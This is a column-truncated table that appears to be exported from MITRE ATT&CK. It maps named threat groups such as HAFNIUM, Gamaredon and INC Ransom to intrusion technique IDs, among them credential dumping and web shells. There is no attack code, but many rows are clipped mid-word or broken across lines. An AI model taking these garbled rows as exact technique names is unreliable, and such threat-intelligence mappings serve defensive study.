G0117 Fox Kitten intrusion- group uses T1560.001Archive viaattack-pat technique [Fox Kitten
G0117 Fox Kitten intrusion- group uses T1217 Browser Inattack-pat technique [Fox Kitte
G0117 Fox Kitten intrusion- group uses T1110 Brute Forc attack-pat technique [Fox Kitten
G0117 Fox Kitten intrusion- group uses T1027.010Command aOttack-pat technique [Fox Kitte
G0117 Fox Kitten intrusion- group uses T1059 Command attack-pat
an technique [Fox Kitten
G0117 Fox Kitten intrusion- group uses T1552.001Credentialsattack-pat technique [Fox Kitten
G0117 Fox Kitten intrusion- group uses T1530 Data from attack-pat technique [Fox Kitten
G0117 Fox Kitten intrusion- group uses T1005 Data from attack-pat technique [Fox Kitte
G0117 Fox Kitten intrusion- group uses T1039 Data from attack-pat technique [Fox Kitte
G0117 Fox Kitten intrusion- group uses T1087.002Domain Acattack-pat technique [Fox Kitte
G0117 Fox Kitten intrusion- group uses T1027.013Encrypted/attack-pat technique [Fox Kitte
G0117 Fox Kitten intrusion- group uses T1585 Establish attack-pat technique [Fox Kitte
G0117 Fox Kitten intrusion- group uses T1190 Exploit Pubattack-pat technique [Fox Kitten
G0117 Fox Kitten intrusion- group uses T1210 Exploitatioattack-pat technique [Fox Kitten
G0117 Fox Kitten intrusion- group uses T1083 File and Di attack-pat technique [Fox Kitten
G0117 Fox Kitten intrusion- group uses T1105 Ingress Tooattack-pat technique [Fox Kitten
G0117 Fox Kitten intrusion- group uses T1003.001LSASS Memattack-pat technique [Fox Kitte
G0117 Fox Kitten intrusion- group uses T1087.001Local Acco attack-pat technique [Fox Kitte
G0117 Fox Kitten intrusion- group uses T1136.001Local Acco attack-pat technique [Fox Kitten
G0117 Fox Kitten intrusion- group uses T1036.004Masquerade attack-pat technique [Fox Kitten
G0117 Fox Kitten intrusion- group uses T1036.005Match Legiattack-pat technique [Fox Kitten
G0117 Fox Kitten intrusion- group uses T1213.005Messaging attack-pat technique [Fox Kitte
G0117 Fox Kitten intrusion- group uses T1003.003NTDS attack-pat technique [Fox Kitte
G0117 Fox Kitten intrusion- group uses T1046 Network Seattack-pat technique [Fox Kitte
G0117 Fox Kitten intrusion- group uses T1555.005Password attack-pat technique [Fox Kitten
G0117 Fox Kitten intrusion- group uses T1059.001PowerShellattack-pat technique [Fox Kitten
G0117 Fox Kitten intrusion- group uses T1572 Protocol T attack-pat technique [Fox Kitte
G0117 Fox Kitten intrusion- group uses T1090 Proxy attack-pat technique [Fox Kitte
G0117 Fox Kitten intrusion- group uses T1012 Query Regiattack-pat technique [Fox Kitten
G0117 Fox Kitten intrusion- group uses T1021.001Remote Des attack-pat technique [Fox Kitten
G0117 Fox Kitten intrusion- group uses T1018 Remote Sysattack-pat technique [Fox Kitte
G0117 Fox Kitten intrusion- group uses T1021.002SMB/Windo attack-pat technique [Fox Kitte
G0117 Fox Kitten intrusion- group uses T1021.004SSH attack-pat technique [Fox Kitte
G0117 Fox Kitten intrusion- group uses T1053.005Scheduled attack-pat technique [Fox Kitten
G0117 Fox Kitten intrusion- group uses T1585.001Social Medattack-pat technique [Fox Kitte
G0117 Fox Kitten intrusion- group uses T1021.005VNC attack-pat technique [Fox Kitte
G0117 Fox Kitten intrusion- group uses T1078 Valid Acco attack-pat technique [Fox Kitten
G0117 Fox Kitten intrusion- group uses T1102 Web Servicattack-pat technique [Fox Kitte
G0117 Fox Kitten intrusion- group uses T1505.003Web Shell attack-pat technique [Fox Kitte
G0117 Fox Kitten intrusion- group uses T1059.003Windows Cattack-pat technique [Fox Kitte
G0093 GALLIUM intrusion- group uses T1560.001Archive viaattack-pat technique [GALLIUM](
G0093 GALLIUM intrusion- group uses T1553.002Code Signi attack-pat technique [GALLIUM](h
G0093 GALLIUM intrusion- group uses T1574.002DLL Side-L attack-pat technique [GALLIUM](h
G0093 GALLIUM intrusion- group uses T1005 Data from attack-pat technique [GALLIUM](h
G0093 GALLIUM intrusion- group uses T1136.002Domain Acattack-pat technique [GALLIUM](
G0093 GALLIUM intrusion- group uses T1041 Exfiltratio attack-pat technique [GALLIUM](h
G0093 GALLIUM intrusion- group uses T1190 Exploit Pubattack-pat technique [GALLIUM](h
G0093 GALLIUM intrusion- group uses T1090.002External Prattack-pat technique [GALLIUM](
G0093 GALLIUM intrusion- group uses T1133 External R attack-pat technique [GALLIUM](
G0093 GALLIUM intrusion- group uses T1027.005Indicator attack-pat technique [GALLIUM](h
G0093 GALLIUM intrusion- group uses T1105 Ingress Tooattack-pat technique [GALLIUM](h
G0093 GALLIUM intrusion- group uses T1003.001LSASS Memattack-pat technique [GALLIUM](
G0093 GALLIUM intrusion- group uses T1570 Lateral Tooattack-pat technique [GALLIUM](
G0093 GALLIUM intrusion- group uses T1074.001Local Data attack-pat technique [GALLIUM](h
G0093 GALLIUM intrusion- group uses T1027 Obfuscatedattack-pat technique [GALLIUM](h
G0093 GALLIUM intrusion- group uses T1550.002Pass the H attack-pat technique [GALLIUM](
G0093 GALLIUM intrusion- group uses T1059.001PowerShellattack-pat technique [GALLIUM](h
G0093 GALLIUM intrusion- group uses T1018 Remote Sysattack-pat technique [GALLIUM](h
G0093 GALLIUM intrusion- group uses T1036.003Rename Sys attack-pat technique [GALLIUM](
G0093 GALLIUM intrusion- group uses T1053.005Scheduled attack-pat technique [GALLIUM](h
G0093 GALLIUM intrusion- group uses T1003.002Security A attack-pat technique [GALLIUM](
G0093 GALLIUM intrusion- group uses T1583.004Server attack-pat technique [GALLIUM](
G0093 GALLIUM intrusion- group uses T1027.002Software Pattack-pat technique [GALLIUM](
G0093 GALLIUM intrusion- group uses T1016 System Netattack-pat technique [GALLIUM](h
G0093 GALLIUM intrusion- group uses T1049 System Netattack-pat technique [GALLIUM](
G0093 GALLIUM intrusion- group uses T1033 System Own attack-pat technique [GALLIUM](
G0093 GALLIUM intrusion- group uses T1588.002Tool attack-pat technique [GALLIUM](h
G0093 GALLIUM intrusion- group uses T1078 Valid Acco attack-pat technique [GALLIUM](h
G0093 GALLIUM intrusion- group uses T1505.003Web Shell attack-pat technique [GALLIUM](h
G0093 GALLIUM intrusion- group uses T1059.003Windows Cattack-pat technique [GALLIUM](
G0093 GALLIUM intrusion- group uses T1047 Windows M attack-pat technique [GALLIUM](h
G0036 GCMAN intrusion- group uses T1021.004SSH attack-pat technique [GCMAN](ht
G0036 GCMAN intrusion- group uses T1021.005VNC attack-pat technique [GCMAN](ht
G0115 GOLD SOUTintrusion- group uses T1027.010Command aOttack-pat technique [GOLD SOUT
G0115 GOLD SOUTintrusion- group uses T1195.002Compromise attack-pat technique [GOLD SOUT
G0115 GOLD SOUTintrusion- group uses T1190 Exploit Pubattack-pat technique [GOLD SOUT
G0115 GOLD SOUTintrusion- group uses T1133 External R attack-pat technique [GOLD SOUT
G0115 GOLD SOUTintrusion- group uses T1566 Phishing attack-pat technique [GOLD SOUT
G0115 GOLD SOUTintrusion- group uses T1059.001PowerShellattack-pat technique [GOLD SOUT
G0115 GOLD SOUTintrusion- group uses T1219 Remote Accattack-pat technique [GOLD SOUT
G0115 GOLD SOUTintrusion- group uses T1113 Screen Capattack-pat technique [GOLD SOUT
G0115 GOLD SOUTintrusion- group uses T1199 Trusted Relattack-pat technique [GOLD SOUT
G0084 Gallmaker intrusion- group uses T1560.001Archive viaattack-pat technique [Gallmaker]
G0084 Gallmaker intrusion- group uses T1559.002Dynamic Daattack-pat technique [Gallmaker]
G0084 Gallmaker intrusion- group uses T1204.002Malicious Fattack-pat technique [Gallmaker]
G0084 Gallmaker intrusion- group uses T1027 Obfuscatedattack-pat technique [Gallmaker
G0084 Gallmaker intrusion- group uses T1059.001PowerShellattack-pat technique [Gallmaker
G0084 Gallmaker intrusion- group uses T1566.001Spearphishattack-pat technique [Gallmaker
G0047 Gamaredonintrusion- group uses T1119 Automatedattack-pat technique [Gamaredon
G0047 Gamaredonintrusion- group uses T1020 Automatedattack-pat technique [Gamaredon
G0047 Gamaredonintrusion- group uses T1027.001Binary Padattack-pat technique [Gamaredon
G0047 Gamaredonintrusion- group uses T1027.010Command aOttack-pat technique [Gamaredon
G0047 Gamaredonintrusion- group uses T1027.004Compile Aftattack-pat technique [Gamaredon
G0047 Gamaredonintrusion- group uses T1559.001Componentattack-pat technique [Gamaredon
G0047 Gamaredonintrusion- group uses T1001 Data Obfusattack-pat technique [Gamaredon
G0047 Gamaredonintrusion- group uses T1005 Data from attack-pat technique [Gamaredon
G0047 Gamaredonintrusion- group uses T1039 Data from attack-pat technique [Gamaredon
G0047 Gamaredonintrusion- group uses T1025 Data from attack-pat technique A [Gamaredo
G0047 Gamaredonintrusion- group uses T1140 Deobfuscatattack-pat technique [Gamaredon
G0047 Gamaredonintrusion- group uses T1562.001Disable or attack-pat technique [Gamaredon
G0047 Gamaredonintrusion- group uses T1561.001Disk Conteattack-pat technique [Gamaredon
G0047 Gamaredonintrusion- group uses T1583.001Domains attack-pat technique [Gamaredon
G0047 Gamaredonintrusion- group uses T1568 Dynamic Reattack-pat technique [Gamaredon
G0047 Gamaredonintrusion- group uses T1480 Execution attack-pat technique [Gamaredon
G0047 Gamaredonintrusion- group uses T1041 Exfiltratio attack-pat technique A [Gamaredo
G0047 Gamaredonintrusion- group uses T1568.001Fast Flux attack-pat technique [Gamaredon
G0047 Gamaredonintrusion- group uses T1070.004File Deleti attack-pat technique [Gamaredon
G0047 Gamaredonintrusion- group uses T1083 File and Di attack-pat technique [Gamaredon
G0047 Gamaredonintrusion- group uses T1564.003Hidden Wi attack-pat technique [Gamaredon
G0047 Gamaredonintrusion- group uses T1105 Ingress Tooattack-pat technique [Gamaredon
G0047 Gamaredonintrusion- group uses T1491.001Internal D attack-pat technique [Gamaredon
G0047 Gamaredonintrusion- group uses T1534 Internal Spattack-pat technique [Gamaredon
G0047 Gamaredonintrusion- group uses T1016.001Internet C attack-pat technique [Gamaredon
G0047 Gamaredonintrusion- group uses T1204.002Malicious Fattack-pat technique [Gamaredon
G0047 Gamaredonintrusion- group uses T1204.001Malicious Lattack-pat technique [Gamaredon
G0047 Gamaredonintrusion- group uses T1036.005Match Legiattack-pat technique [Gamaredon
G0047 Gamaredonintrusion- group uses T1112 Modify Regattack-pat technique [Gamaredon
G0047 Gamaredonintrusion- group uses T1218.005Mshta attack-pat technique [Gamaredon
G0047 Gamaredonintrusion- group uses T1106 Native API attack-pat technique [Gamaredon
G0047 Gamaredonintrusion- group uses T1027 Obfuscatedattack-pat technique [Gamaredon
G0047 Gamaredonintrusion- group uses T1137 Office Applattack-pat technique [Gamaredon
G0047 Gamaredonintrusion- group uses T1102.003One-Way Cattack-pat technique [Gamaredon
G0047 Gamaredonintrusion- group uses T1120 Peripheral attack-pat technique [Gamaredon
G0047 Gamaredonintrusion- group uses T1059.001PowerShellattack-pat technique [Gamaredon
G0047 Gamaredonintrusion- group uses T1057 Process Di attack-pat technique [Gamaredon
G0047 Gamaredonintrusion- group uses T1547.001Registry Ruattack-pat technique [Gamaredon
G0047 Gamaredonintrusion- group uses T1218.011Rundll32 attack-pat technique [Gamaredon
G0047 Gamaredonintrusion- group uses T1053.005Scheduled attack-pat technique [Gamaredon
G0047 Gamaredonintrusion- group uses T1113 Screen Capattack-pat technique [Gamaredon
G0047 Gamaredonintrusion- group uses T1566.001Spearphishattack-pat technique [Gamaredon
G0047 Gamaredonintrusion- group uses T1082 System Inf attack-pat technique A [Gamared
G0047 Gamaredonintrusion- group uses T1033 System Own attack-pat technique A [Gamaredo
G0047 Gamaredonintrusion- group uses T1080 Taint Shar attack-pat technique [Gamaredon
G0047 Gamaredonintrusion- group uses T1221 Template Iattack-pat technique [Gamaredon
G0047 Gamaredonintrusion- group uses T1588.002Tool attack-pat technique [Gamaredon
G0047 Gamaredonintrusion- group uses T1608.001Upload Maattack-pat technique [Gamaredon
G0047 Gamaredonintrusion- group uses T1021.005VNC attack-pat technique [Gamaredon
G0047 Gamaredonintrusion- group uses T1583.003Virtual Pri attack-pat technique [Gamaredon
G0047 Gamaredonintrusion- group uses T1059.005Visual Basiattack-pat technique [Gamaredon
G0047 Gamaredonintrusion- group uses T1071.001Web Protocattack-pat technique [Gamaredon
G0047 Gamaredonintrusion- group uses T1102 Web Servicattack-pat technique [Gamaredon
G0047 Gamaredonintrusion- group uses T1059.003Windows Cattack-pat technique [Gamaredon
G0047 Gamaredonintrusion- group uses T1047 Windows M attack-pat technique [Gamaredon
G0078 Gorgon Gr intrusion- group uses T1140 Deobfuscatattack-pat technique [Gorgon Gr
G0078 Gorgon Gr intrusion- group uses T1562.001Disable or attack-pat technique [Gorgon Gr
G0078 Gorgon Gr intrusion- group uses T1564.003Hidden Wi attack-pat technique [Gorgon Gr
G0078 Gorgon Gr intrusion- group uses T1105 Ingress Tooattack-pat technique [Gorgon Gr
G0078 Gorgon Gr intrusion- group uses T1204.002Malicious Fattack-pat technique [Gorgon Gro
G0078 Gorgon Gr intrusion- group uses T1112 Modify Regattack-pat technique [Gorgon Gr
G0078 Gorgon Gr intrusion- group uses T1106 Native API attack-pat technique [Gorgon Gr
G0078 Gorgon Gr intrusion- group uses T1055.002Portable Exattack-pat technique [Gorgon Gr
G0078 Gorgon Gr intrusion- group uses T1059.001PowerShellattack-pat technique [Gorgon Gr
G0078 Gorgon Gr intrusion- group uses T1055.012Process Hoattack-pat technique [Gorgon Gro
G0078 Gorgon Gr intrusion- group uses T1547.001Registry Ruattack-pat technique [Gorgon Gro
G0078 Gorgon Gr intrusion- group uses T1547.009Shortcut Mattack-pat technique [Gorgon Gro
G0078 Gorgon Gr intrusion- group uses T1566.001Spearphishattack-pat technique [Gorgon Gr
G0078 Gorgon Gr intrusion- group uses T1588.002Tool attack-pat technique [Gorgon Gr
G0078 Gorgon Gr intrusion- group uses T1059.005Visual Basiattack-pat technique [Gorgon Gr
G0078 Gorgon Gr intrusion- group uses T1059.003Windows Cattack-pat technique [Gorgon Gr
G0043 Group5 intrusion- group uses T1027.013Encrypted/attack-pat technique [Group5](ht
G0043 Group5 intrusion- group uses T1070.004File Deleti attack-pat technique Malware use
G0043 Group5 intrusion- group uses T1056.001Keyloggingattack-pat technique Malware use
G0043 Group5 intrusion- group uses T1113 Screen Capattack-pat technique Malware use
G0125 HAFNIUM intrusion- group uses T1098 Account Ma attack-pat technique [HAFNIUM](
G0125 HAFNIUM intrusion- group uses T1560.001Archive viaattack-pat technique [HAFNIUM](
G0125 HAFNIUM intrusion- group uses T1592.004Client Confattack-pat technique [HAFNIUM](
G0125 HAFNIUM intrusion- group uses T1005 Data from attack-pat technique [HAFNIUM](
G0125 HAFNIUM intrusion- group uses T1136.002Domain Acattack-pat technique [HAFNIUM](
G0125 HAFNIUM intrusion- group uses T1589.002Email Addrattack-pat technique [HAFNIUM](
G0125 HAFNIUM intrusion- group uses T1567.002Exfiltratio attack-pat technique [HAFNIUM](h
G0125 HAFNIUM intrusion- group uses T1190 Exploit Pubattack-pat technique [HAFNIUM](
G0125 HAFNIUM intrusion- group uses T1083 File and Di attack-pat technique [HAFNIUM](
G0125 HAFNIUM intrusion- group uses T1590 Gather Vic attack-pat technique [HAFNIUM](
G0125 HAFNIUM intrusion- group uses T1564.001Hidden Fileattack-pat technique [HAFNIUM](
G0125 HAFNIUM intrusion- group uses T1590.005IP Address attack-pat technique [HAFNIUM](
G0125 HAFNIUM intrusion- group uses T1105 Ingress Tooattack-pat technique [HAFNIUM](
G0125 HAFNIUM intrusion- group uses T1016.001Internet C attack-pat technique [HAFNIUM](
G0125 HAFNIUM intrusion- group uses T1003.001LSASS Memattack-pat technique [HAFNIUM](
G0125 HAFNIUM intrusion- group uses T1078.003Local Acco attack-pat technique [HAFNIUM](
G0125 HAFNIUM intrusion- group uses T1003.003NTDS attack-pat technique [HAFNIUM](
G0125 HAFNIUM intrusion- group uses T1095 Non-Applicattack-pat technique [HAFNIUM](
G0125 HAFNIUM intrusion- group uses T1059.001PowerShellattack-pat technique [HAFNIUM](
G0125 HAFNIUM intrusion- group uses T1057 Process Di attack-pat technique [HAFNIUM](
G0125 HAFNIUM intrusion- group uses T1114.002Remote Ema attack-pat technique [HAFNIUM](
G0125 HAFNIUM intrusion- group uses T1018 Remote Sysattack-pat technique [HAFNIUM](
G0125 HAFNIUM intrusion- group uses T1218.011Rundll32 attack-pat technique [HAFNIUM](
G0125 HAFNIUM intrusion- group uses T1132.001Standard Eattack-pat technique [HAFNIUM](
G0125 HAFNIUM intrusion- group uses T1016 System Netattack-pat technique [HAFNIUM](
G0125 HAFNIUM intrusion- group uses T1033 System Own attack-pat technique [HAFNIUM](
G0125 HAFNIUM intrusion- group uses T1583.003Virtual Pri attack-pat technique [HAFNIUM](
G0125 HAFNIUM intrusion- group uses T1071.001Web Protocattack-pat technique [HAFNIUM](
G0125 HAFNIUM intrusion- group uses T1583.006Web Servicattack-pat technique [HAFNIUM](
G0125 HAFNIUM intrusion- group uses T1505.003Web Shell attack-pat technique [HAFNIUM](
G0125 HAFNIUM intrusion- group uses T1059.003Windows Cattack-pat technique [HAFNIUM](
G1001 HEXANE intrusion- group uses T1010 Applicatio attack-pat technique [HEXANE](h
G1001 HEXANE intrusion- group uses T1102.002Bidirectio attack-pat technique [HEXANE](h
G1001 HEXANE intrusion- group uses T1110 Brute Forc attack-pat technique [HEXANE](h
G1001 HEXANE intrusion- group uses T1027.010Command aOttack-pat technique [HEXANE](h
G1001 HEXANE intrusion- group uses T1555 Credential attack-pat technique [HEXANE](h
G1001 HEXANE intrusion- group uses T1555.003Credential attack-pat technique [HEXANE](h
G1001 HEXANE intrusion- group uses T1583.002DNS Serverattack-pat technique [HEXANE](h
G1001 HEXANE intrusion- group uses T1583.001Domains attack-pat technique [HEXANE](h
G1001 HEXANE intrusion- group uses T1586.002Email Accoattack-pat technique [HEXANE](h
G1001 HEXANE intrusion- group uses T1585.002Email Accoattack-pat technique [HEXANE](ht
[HEXANE](https://attack.mitr
G1001 HEXANE intrusion- group uses T1589.002Email Addrattack-pat technique
G1001 HEXANE intrusion- group uses T1567.002Exfiltratio attack-pat technique [HEXANE](ht
G1001 HEXANE intrusion- group uses T1589 Gather Victattack-pat technique [HEXANE](ht
G1001 HEXANE intrusion- group uses T1591.004Identify Roattack-pat technique [HEXANE](ht
G1001 HEXANE intrusion- group uses T1105 Ingress Tooattack-pat technique [HEXANE](h
G1001 HEXANE intrusion- group uses T1534 Internal Spattack-pat technique [HEXANE](ht
G1001 HEXANE intrusion- group uses T1016.001Internet C attack-pat technique [HEXANE](h
G1001 HEXANE intrusion- group uses T1056.001Keyloggingattack-pat technique [HEXANE](h
G1001 HEXANE intrusion- group uses T1069.001Local Grouattack-pat technique [HEXANE](h
G1001 HEXANE intrusion- group uses T1204.002Malicious Fattack-pat technique [HEXANE](ht
G1001 HEXANE intrusion- group uses T1110.003Password Sattack-pat technique [HEXANE](ht
G1001 HEXANE intrusion- group uses T1059.001PowerShellattack-pat technique [HEXANE](h
G1001 HEXANE intrusion- group uses T1057 Process Di attack-pat technique [HEXANE](h
G1001 HEXANE intrusion- group uses T1021.001Remote Des attack-pat technique [HEXANE](h
G1001 HEXANE intrusion- group uses T1018 Remote Sysattack-pat technique [HEXANE](h
G1001 HEXANE intrusion- group uses T1053.005Scheduled attack-pat technique [HEXANE](ht
G1001 HEXANE intrusion- group uses T1585.001Social Medattack-pat technique [HEXANE](ht
G1001 HEXANE intrusion- group uses T1518 Software Dattack-pat technique [HEXANE](h
G1001 HEXANE intrusion- group uses T1082 System Inf attack-pat technique [HEXANE](h
G1001 HEXANE intrusion- group uses T1016 System Netattack-pat technique [HEXANE](ht
G1001 HEXANE intrusion- group uses T1049 System Netattack-pat technique [HEXANE](ht
G1001 HEXANE intrusion- group uses T1033 System Own attack-pat technique [HEXANE](h
G1001 HEXANE intrusion- group uses T1588.002Tool attack-pat technique [HEXANE](h
G1001 HEXANE intrusion- group uses T1608.001Upload Maattack-pat technique [HEXANE](h
G1001 HEXANE intrusion- group uses T1059.005Visual Basiattack-pat technique [HEXANE](h
G1001 HEXANE intrusion- group uses T1546.003Windows Ma attack-pat technique [HEXANE](h
G0126 Higaisa intrusion- group uses T1027.001Binary Padattack-pat technique [Higaisa](h
G0126 Higaisa intrusion- group uses T1574.002DLL Side-L attack-pat technique [Higaisa](h
G0126 Higaisa intrusion- group uses T1140 Deobfuscatattack-pat technique [Higaisa](h
G0126 Higaisa intrusion- group uses T1027.013Encrypted/attack-pat technique [Higaisa](
G0126 Higaisa intrusion- group uses T1041 Exfiltratio attack-pat technique [Higaisa](h
G0126 Higaisa intrusion- group uses T1203 Exploitatioattack-pat technique [Higaisa](h
G0126 Higaisa intrusion- group uses T1564.003Hidden Wi attack-pat technique [Higaisa](h
G0126 Higaisa intrusion- group uses T1090.001Internal Prattack-pat technique [Higaisa](h
G0126 Higaisa intrusion- group uses T1059.007JavaScript attack-pat technique [Higaisa](h
G0126 Higaisa intrusion- group uses T1204.002Malicious Fattack-pat technique [Higaisa](h
G0126 Higaisa intrusion- group uses T1036.004Masquerade attack-pat technique [Higaisa](h
G0126 Higaisa intrusion- group uses T1106 Native API attack-pat technique [Higaisa](h
G0126 Higaisa intrusion- group uses T1057 Process Di attack-pat technique [Higaisa](h
G0126 Higaisa intrusion- group uses T1001.003Protocol o attack-pat technique [Higaisa](h
G0126 Higaisa intrusion- group uses T1547.001Registry Ruattack-pat technique [Higaisa](h
G0126 Higaisa intrusion- group uses T1053.005Scheduled attack-pat technique [Higaisa](
G0126 Higaisa intrusion- group uses T1029 Scheduled attack-pat technique [Higaisa](h
G0126 Higaisa intrusion- group uses T1566.001Spearphishattack-pat technique [Higaisa](h
G0126 Higaisa intrusion- group uses T1573.001Symmetric attack-pat technique [Higaisa](h
G0126 Higaisa intrusion- group uses T1082 System Inf attack-pat technique [Higaisa](
G0126 Higaisa intrusion- group uses T1016 System Netattack-pat technique [Higaisa](h
G0126 Higaisa intrusion- group uses T1124 System Timattack-pat technique [Higaisa](h
G0126 Higaisa intrusion- group uses T1059.005Visual Basiattack-pat technique [Higaisa](h
G0126 Higaisa intrusion- group uses T1071.001Web Protocattack-pat technique [Higaisa](h
G0126 Higaisa intrusion- group uses T1059.003Windows Cattack-pat technique [Higaisa](h
G0126 Higaisa intrusion- group uses T1220 XSL Script attack-pat technique [Higaisa](h
G1032 INC Ranso intrusion- group uses T1071 Applicationattack-pat technique [INC Ranso
G1032 INC Ranso intrusion- group uses T1560.001Archive viaattack-pat technique [INC Ranso
G1032 INC Ranso intrusion- group uses T1486 Data Encryattack-pat technique [INC Ranso
G1032 INC Ranso intrusion- group uses T1074 Data Stageattack-pat technique [INC Ranso
G1032 INC Ranso intrusion- group uses T1562.001Disable or attack-pat technique [INC Ranso
G1032 INC Ranso intrusion- group uses T1087.002Domain Acattack-pat technique [INC Ranso
G1032 INC Ranso intrusion- group uses T1069.002Domain Grattack-pat technique [INC Ranso
G1032 INC Ranso intrusion- group uses T1190 Exploit Pubattack-pat technique [INC Ransom
G1032 INC Ranso intrusion- group uses T1070.004File Deleti attack-pat technique [INC Ransom](https://attack.
G1032 INC Ranso intrusion- group uses T1657 Financial Tattack-pat technique [INC Ranso
G1032 INC Ranso intrusion- group uses T1105 Ingress Tooattack-pat technique [INC Ranso
G1032 INC Ranso intrusion- group uses T1570 Lateral Tooattack-pat technique [INC Ransom](https://attack.
G1032 INC Ranso intrusion- group uses T1036.005Match Legiattack-pat technique [INC Ranso
G1032 INC Ranso intrusion- group uses T1046 Network Seattack-pat technique [INC Ranso
G1032 INC Ranso intrusion- group uses T1135 Network Shattack-pat technique [INC
[INC Ranso
Ransom](https://attack.
G1032 INC Ranso intrusion- group uses T1566 Phishing attack-pat technique
G1032 INC Ranso intrusion- group uses T1219 Remote Accattack-pat technique [INC Ransom](https://attack.
G1032 INC Ranso intrusion- group uses T1021.001Remote Des attack-pat technique [INC Ransom](https://attack.
G1032 INC Ranso intrusion- group uses T1569.002Service Ex attack-pat technique [INC Ranso
G1032 INC Ranso intrusion- group uses T1049 System Netattack-pat technique [INC Ranso
G1032 INC Ranso intrusion- group uses T1588.002Tool attack-pat technique [INC Ranso
G1032 INC Ranso intrusion- group uses T1537 Transfer D attack-pat technique [INC Ranso
G1032 INC Ranso intrusion- group uses T1078 Valid Acco attack-pat technique [INC Ransom](https://attack.
G1032 INC Ranso intrusion- group uses T1059.003Windows Cattack-pat technique [INC Ranso
G1032 INC Ranso intrusion- group uses T1047 Windows M attack-pat technique [INC Ranso
G0100 Inception intrusion- group uses T1555.003Credential attack-pat technique [Inception
G0100 Inception intrusion- group uses T1005 Data from attack-pat technique [Inception]
G0100 Inception intrusion- group uses T1069.002Domain Grattack-pat technique [Inception
G0100 Inception intrusion- group uses T1027.013Encrypted/attack-pat technique [Inception
G0100 Inception intrusion- group uses T1203 Exploitatioattack-pat technique [Inception
G0100 Inception intrusion- group uses T1083 File and Di attack-pat technique [Inception]
G0100 Inception intrusion- group uses T1204.002Malicious Fattack-pat technique [Inception]
G0100 Inception intrusion- group uses T1218.005Mshta attack-pat technique [Inception]
G0100 Inception intrusion- group uses T1090.003Multi-hop attack-pat technique [Inception
G0100 Inception intrusion- group uses T1059.001PowerShellattack-pat technique [Inception
G0100 Inception intrusion- group uses T1057 Process Di attack-pat technique [Inception
[Inception](https://attack.mi
G0100 Inception intrusion- group uses T1547.001Registry Ruattack-pat technique <code>HKEY_CURRENT_USE
G0100 Inception intrusion- group uses T1218.010Regsvr32 attack-pat technique [Inception
G0100 Inception intrusion- group uses T1518 Software Dattack-pat technique [Inception
G0100 Inception intrusion- group uses T1566.001Spearphishattack-pat technique [Inception
G0100 Inception intrusion- group uses T1573.001Symmetric attack-pat technique [Inception
G0100 Inception intrusion- group uses T1082 System Inf attack-pat technique [Inception
G0100 Inception intrusion- group uses T1221 Template Iattack-pat technique [Inception
G0100 Inception intrusion- group uses T1588.002Tool attack-pat technique [Inception]
G0100 Inception intrusion- group uses T1059.005Visual Basiattack-pat technique [Inception
G0100 Inception intrusion- group uses T1071.001Web Protocattack-pat technique [Inception
G0100 Inception intrusion- group uses T1102 Web Servicattack-pat technique [Inception]
G0136 IndigoZebrintrusion- group uses T1583.001Domains attack-pat technique [IndigoZebr
G0136 IndigoZebrintrusion- group uses T1586.002Email Accoattack-pat technique [IndigoZebr
G0136 IndigoZebrintrusion- group uses T1105 Ingress Tooattack-pat technique [IndigoZebr
G0136 IndigoZebrintrusion- group uses T1204.002Malicious Fattack-pat technique [IndigoZebr
G0136 IndigoZebrintrusion- group uses T1566.001Spearphishattack-pat technique [IndigoZeb
G0136 IndigoZebrintrusion- group uses T1588.002Tool attack-pat technique [IndigoZebr
G0136 IndigoZebrintrusion- group uses T1583.006Web Servicattack-pat technique [IndigoZebr
G0119 Indrik Spidintrusion- group uses T1583 Acquire Infattack-pat technique [Indrik Spi
G0119 Indrik Spidintrusion- group uses T1070.001Clear Windattack-pat technique [Indrik Spi
G0119 Indrik Spidintrusion- group uses T1136 Create Accattack-pat technique [Indrik Sp
G0119 Indrik Spidintrusion- group uses T1552.001Credentialsattack-pat technique [Indrik Spi
G0119 Indrik Spidintrusion- group uses T1486 Data Encryattack-pat technique [Indrik Spi
G0119 Indrik Spidintrusion- group uses T1562.001Disable or attack-pat technique [Indrik Spi
G0119 Indrik Spidintrusion- group uses T1078.002Domain Acattack-pat technique [Indrik Spi
G0119 Indrik Spidintrusion- group uses T1585.002Email Accoattack-pat technique [Indrik Spi
G0119 Indrik Spidintrusion- group uses T1567.002Exfiltratio attack-pat technique [Indrik Sp
G0119 Indrik Spidintrusion- group uses T1590 Gather Vic attack-pat technique [Indrik Spi
G0119 Indrik Spidintrusion- group uses T1484.001Group Poliattack-pat technique [Indrik Spi
G0119 Indrik Spidintrusion- group uses T1105 Ingress Tooattack-pat technique [Indrik Sp
G0119 Indrik Spidintrusion- group uses T1059.007JavaScript attack-pat technique [Indrik Spi
G0119 Indrik Spidintrusion- group uses T1558.003Kerberoastattack-pat technique [Indrik Sp
G0119 Indrik Spidintrusion- group uses T1003.001LSASS Memattack-pat technique [Indrik Spi
G0119 Indrik Spidintrusion- group uses T1136.001Local Acco attack-pat technique [Indrik Spi
G0119 Indrik Spidintrusion- group uses T1074.001Local Data attack-pat technique [Indrik Spi
G0119 Indrik Spidintrusion- group uses T1204.002Malicious Fattack-pat technique [Indrik Spi
G0119 Indrik Spidintrusion- group uses T1587.001Malware attack-pat technique [Indrik Sp
G0119 Indrik Spidintrusion- group uses T1036.005Match Legiattack-pat technique [Indrik Spi
G0119 Indrik Spidintrusion- group uses T1112 Modify Regattack-pat technique [Indrik Spi
G0119 Indrik Spidintrusion- group uses T1555.005Password attack-pat technique [Indrik Sp
G0119 Indrik Spidintrusion- group uses T1059.001PowerShellattack-pat technique [Indrik Sp
G0119 Indrik Spidintrusion- group uses T1012 Query Regiattack-pat technique [Indrik Spi
G0119 Indrik Spidintrusion- group uses T1021.001Remote Des attack-pat technique [Indrik Sp
G0119 Indrik Spidintrusion- group uses T1018 Remote Sysattack-pat technique [Indrik Sp
G0119 Indrik Spidintrusion- group uses T1021.004SSH attack-pat technique [Indrik Sp
G0119 Indrik Spidintrusion- group uses T1584.004Server attack-pat technique [Indrik Spi
G0119 Indrik Spidintrusion- group uses T1489 Service Stoattack-pat technique [Indrik Spi
G0119 Indrik Spidintrusion- group uses T1007 System Serattack-pat technique [Indrik Spi
